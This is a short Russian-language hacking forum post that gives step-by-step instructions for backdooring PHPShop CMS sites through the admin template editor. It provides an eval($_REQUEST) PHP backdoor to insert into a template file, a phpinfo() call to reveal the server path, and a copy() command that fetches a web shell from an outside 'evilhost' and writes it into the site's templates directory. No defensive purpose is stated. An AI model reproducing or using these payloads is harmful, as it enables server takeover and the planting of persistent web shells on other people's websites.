
16.03.2013, 02:31
|
|
Guest
Сообщений: n/a
Провел на форуме: 97570
Репутация:
267
|
|
PHPShop & PHPShop CMS Free - Latest Version
Developers - phpshop.ru , cms.phpshopcms.ru
Need: Admin Access
Admin url: /phpshop/admpanel/
Заходим в редактор .tpl шаблонов. Выбираем тему с шаблоном которой будем работать, можно выбрать текущую тему, например "gray"
Выбираем файл шаблона, например файл шаблона для главной страницы "main/index.tpl"
Внедряем свой код
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]@[/COLOR][COLOR="#0000BB"]php
[/COLOR][COLOR="#007700"]eval([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]e[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]@[/COLOR][/COLOR]
Смотрим абсолютный путь:
Код:
Code:
localhost/?e=phpinfo();
Льем шелл:
Код:
Code:
localhost/?e=copy("evilhost/shell.txt","/home/yoursite/phpshop/templates/gray/main/shell.php");
|
|
|
|